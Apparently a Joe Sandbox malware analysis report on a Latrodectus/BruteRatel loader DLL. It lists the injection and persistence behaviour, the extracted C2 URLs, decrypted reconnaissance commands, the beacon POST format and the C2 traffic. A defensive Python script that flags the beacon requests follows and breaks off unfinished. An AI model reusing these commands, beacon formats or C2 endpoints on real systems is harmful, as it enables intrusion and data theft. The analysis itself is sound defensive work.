
Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name: upfilles.dll.dll (renamed file extension from exe to dll)
Original sample name: upfilles.dll.exe
Analysis ID: 1439879
MD5: ccb6d3cb020f56758622911ddd2f1fcb
SHA1: 4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256: f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags: exe

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 6632 cmdline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 344 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 5472 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 6296 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 6688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6324 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 3732 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7264 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7272 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7388 cmdline: C:\Windows\system32\WerFault.exe -u -p 7272 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7396 cmdline: C:\Windows\system32\WerFault.exe -u -p 7288 -s 344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7296 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7320 cmdline: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7856 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 7984 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Roaming\upfilles.dll", stow MD5: EF3179D498793BF4234F708D3BE28633)
Name: Brute Ratel C4 (BruteRatel)
Description: Brute Ratel is a customized Command and Control Center for Red Team and Adversary Simulation. SMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more. Built-in debugger to detect EDR userland hooks. Ability to keep memory artifacts hidden from EDRs and AV. Direct Windows SYS calls on the fly.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Unidentified 111 (Latrodectus)
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Extracted malware configuration (Latrodectus):
{"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
Yara matches in memory dumps (Source | Rule | Description | Author):
00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security
00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security
00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security
00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security
(35 further entries omitted in this view)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
18.3.rundll32.exe.7df4f0220000.0.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
22.0.explorer.exe.13a0000.0.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
18.3.rundll32.exe.7df4f0220000.0.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
22.0.explorer.exe.13a0000.0.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
22.2.explorer.exe.13a0000.0.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security
(4 further entries omitted in this view)

System Summary

Sigma rule matches:
Source: Process started | Author: elhoim, CD_ROM_ | Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7320, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 2580, ProcessName: explorer.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: rundll32 "C:\Users\user\AppData\Roaming\upfilles.dll", stow...`.U. `.....#..p..8.. `......., EventID: 13, EventType: SetValue, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7320, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update
No Snort rule has matched

AV Detection

Source: 22.0.explorer.exe.13a0000.0.unpack | Malware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
Source: upfilles.dll.dll | ReversingLabs: Detection: 15%
Source: 22.0.explorer.exe.13a0000.0.unpack | String decryptor (one decrypted string per line, in the order reported):
  /c ipconfig /all
  C:\Windows\System32\cmd.exe
  /c systeminfo
  C:\Windows\System32\cmd.exe
  /c nltest /domain_trusts
  C:\Windows\System32\cmd.exe
  /c net view /all /domain
  /c nltest /domain_trusts /all_trusts
  C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe
  /c net view /all
  C:\Windows\System32\cmd.exe
  &ipconfig=
  /c net group "Domain Admins" /domain
  C:\Windows\System32\cmd.exe
  /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
  C:\Windows\System32\wbem\wmic.exe
  /c net config workstation
  C:\Windows\System32\cmd.exe
  /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
  C:\Windows\System32\cmd.exe
  /c whoami /groups
  C:\Windows\System32\cmd.exe
  &systeminfo=
  &domain_trusts=
  &domain_trusts_all=
  &net_view_all_domain=
  &net_view_all=
  &net_group=
  &wmic=
  &net_config_ws=
  &net_wmic_av=
  &whoami_group=
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &proclist=[
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &desklinks=[
  *.*
  "%s"
  Update_%x
  Custom_update
  .dll
  .exe
  runnung
  -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
  [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
  ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
  /files/
  Electrol
  .+`lgSRHYJPpU\IETT05?=CAI
  POST
  GET
  curl/7.88.1
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  p:
  URLS
  COMMAND
  ERROR
  xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
  -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
  sZp
  @-
  &=
  <html>
  <!DOCTYPE
  %s%d.dll
  12345
  &stiller=
  %s%d.exe
  LogonTrigger
  %x%x
  TimeTrigger
  PT0H%02dM
  %04d-%02d-%02dT%02d:%02d:%02d
  &mac=
  %02x
  :%02x
  PT0S
  &computername=%s
  &domain=%s
  ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  \*.dll
  %04X%04X%04X%04X%08X%04X
  %04X%04X%04X%04X%08X%04X
  @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
  https://workspacin.cloud/live/
  https://illoskanawer.com/live/
  AppData
  Desktop
  Startup
  Personal
  Local AppData
  Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  \update_data.dat
Source: unknown | HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb | source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800192B8 FindFirstFileExW,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,
Source: C:\Windows\explorer.exe | Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Windows\explorer.exe | Code function: 22_2_013ADCE0 FindFirstFileW,

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 138.124.183.215 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 3.69.236.35 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 91.194.11.183 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 54.175.181.104 443
Source: C:\Windows\System32\rundll32.exe | Network Connect: 95.164.68.73 443
Source: C:\Windows\explorer.exe | Network Connect: 104.21.16.155 443
Source: Malware configuration extractor | URLs: https://workspacin.cloud/live/
Source: Malware configuration extractor | URLs: https://illoskanawer.com/live/
Source: Joe Sandbox View | ASN Name: NASSIST-ASGI
Source: Joe Sandbox View | ASN Name: NOKIA-ASFI
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: HQservCommunicationSolutionsIL
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 538 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 656 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 444 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 248 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 180 | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Windows\explorer.exe | Code function: 22_2_013A4004 InternetReadFile,
                      Source: global trafficDNS traffic detected: DNS query: boriz400.com
                      Source: global trafficDNS traffic detected: DNS query: altynbe.com
                      Source: global trafficDNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: anikvan.com
                      Source: global trafficDNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: workspacin.cloud
                      Source: unknownHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:29 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:54 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:21 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
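The requests listed above fall into two fixed shapes: a Chrome/90 User-Agent that POSTs a constant 154-byte body to /api/azure or /content.php with no Accept or Content-Type header, and a "Tob 1.1" User-Agent that POSTs to /live/. Both are easy to turn into a log check. The block below is an added example and is not part of the Joe Sandbox report: the sample records are constructed from the headers listed above, the benign control hosts (intranet.example, www.example.com) are made up, and the pipe-separated "request line|Header: value|..." record layout is an assumed log format rather than one any particular proxy emits.

```python
"""Flag the two HTTP beacon profiles listed in the report in a request log.

Added example, not part of the Joe Sandbox report. The sample records are
constructed from the headers the report lists; the pipe-separated record
layout is an assumed log format, not one any particular proxy emits.
"""
import re

# Exact User-Agent strings observed in the report.
UA_CHROME90 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36")
UA_TOB11 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)"

# Paths the Chrome/90 profile POSTs to.
BEACON_PATHS = {"/api/azure", "/content.php"}

# Constructed sample log: one request per entry, "request line|Header: value|...".
SAMPLE_LOG = [
    "POST /api/azure HTTP/1.1|User-Agent: " + UA_CHROME90
    + "|Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io|Content-Length: 154"
    + "|Connection: Keep-Alive|Cache-Control: no-cache",
    "POST /content.php HTTP/1.1|User-Agent: " + UA_CHROME90
    + "|Host: altynbe.com|Content-Length: 154|Connection: Keep-Alive|Cache-Control: no-cache",
    "POST /content.php HTTP/1.1|User-Agent: " + UA_CHROME90
    + "|Host: anikvan.com|Content-Length: 154|Connection: Keep-Alive|Cache-Control: no-cache",
    "POST /api/azure HTTP/1.1|User-Agent: " + UA_CHROME90
    + "|Host: boriz400.com|Content-Length: 538|Connection: Keep-Alive|Cache-Control: no-cache",
    "POST /live/ HTTP/1.1|Accept: */*|Content-Type: application/x-www-form-urlencoded"
    + "|User-Agent: " + UA_TOB11 + "|Host: workspacin.cloud|Content-Length: 248|Cache-Control: no-cache",
    # Benign controls (made-up hosts): a browser form post carries Accept and
    # Content-Type, and a GET is not a check-in.
    "POST /content.php HTTP/1.1|Accept: text/html,*/*|Content-Type: application/x-www-form-urlencoded"
    + "|User-Agent: " + UA_CHROME90 + "|Host: intranet.example|Content-Length: 154",
    "GET /index.html HTTP/1.1|Accept: */*|User-Agent: " + UA_CHROME90 + "|Host: www.example.com",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")


def parse_record(record):
    """Split a record into (method, path, headers); header names are lower-cased."""
    request_line, *header_fields = record.split("|")
    m = REQUEST_LINE.match(request_line)
    if m is None:
        return None
    headers = {}
    for field in header_fields:
        name, _, value = field.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group("method"), m.group("path"), headers


def classify(record):
    """Return the name of the beacon profile a record matches, or None."""
    parsed = parse_record(record)
    if parsed is None:
        return None
    method, path, h = parsed
    ua = h.get("user-agent", "")
    # Profile 1: the "Tob 1.1" token does not occur in any legitimate browser UA,
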